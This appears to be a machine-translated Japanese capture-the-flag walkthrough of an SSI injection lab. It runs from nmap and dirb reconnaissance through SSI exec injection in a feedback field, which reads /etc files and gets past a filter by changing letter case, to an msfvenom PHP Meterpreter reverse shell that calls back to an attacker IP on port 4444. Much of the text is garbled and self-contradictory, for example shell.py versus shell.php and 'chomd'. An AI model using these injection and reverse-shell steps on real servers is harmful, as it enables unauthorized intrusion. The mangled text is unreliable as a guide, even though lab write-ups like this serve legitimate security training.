Ssiインジェクション
Ssi Injection
Ssiインジェクションは、フォーマットに類似した入力ポイント入力を見つけて、システムコマンドを実行できるかどうかを確認することです。
といった
ディレクトリを切り替える
いつものように、ifconfigが自身のIPをスキャンアウトすると、nmap-sV攻撃者のIPは、ターゲットマシンのIPと、開いているポートおよび関連情報を取得できます。
httpサービスのターゲットポートオープンポート80を参照し、dirbを使用して機密情報を検出します
次に、robot.txt、/ spukcab /へのリンクを介して、
ロボットの代わりにそれを使用してください、txtは2つのファイルインデックスを取得します、bak oldconfig.bak、それをダウンロードして、ターミナルでそれを開きます
一連のコードテキストを取得します。それが役立つかどうかわからないので、2匹の猫を完全に倒します。
それに加えて
これはSSIインジェクションフォーマットと同じです。二重引用符は、対応するLinuxコマンドです。このコマンドを使用すると、現在のシステムのユーザー名とパスワードを取得できます。
次に、SSIインジェクションの脆弱性を使用します。
私たちが試したリンクだけで、ランディングページが表示され、開いて、
これをターゲットとフィードバックにコピーします
execbianchengを大文字にすることもできます。
ログイン成功
表示されるのは、先ほどコピーしたLinuxコマンドです。
次に、ログインしたばかりのページに戻り、フィードバック列を追加します-前に!取得する
etcファイルの効果と内容を返しました
次の一歩
シェルスクリプトをダウンロードして名前を変更します
Webシェルを作成します。
Msfvenom -p php / Meterpreter / reverse_tcp lhost = attackerIPアドレスlport = 4444 -f raw> /root/Desktop/shell.php
metasploitを開いてリスニングを開始します。
msfconsole
次に、パラメータを設定します
設定後に実行を入力してください
次に、Pythonスクリプトをダウンロードします。
そして、shell.phpに名前が変更されました
つまり、1以上のログインページに入力します。
shell.pyを/ var / www / html /のルートディレクトリに移動します
現在のディレクトリ情報を表示する
Apacheサービスを開き、サービスのApacheステータスをチェックして、有効になっているかどうかを確認します。
シェルが返されるかどうかを確認します
Lコマンドケース変換を変換して、フィルタリングメカニズムをバイパスし、シェルをアップロードし、シェルをバウンスし、
次に、shell.phpにchomd 777shell.phpへのアクセス許可も付与します。
シェルコマンドを実行した後:sysinfoを使用してシステム情報を表示します
シェルがシステムシェルに入り、検出が以前と同じではありません
Python最適化シェル
最適化、
cd / root /
ls
猫の旗